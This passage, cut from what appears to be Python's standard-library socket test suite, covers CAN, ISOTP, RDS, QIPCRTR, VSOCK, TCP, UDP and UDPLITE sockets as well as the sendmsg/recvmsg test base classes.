self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
support.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, support.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class BasicUDPLITETest(ThreadedUDPLITESocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPLITESocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDPLITE
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDPLITE
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
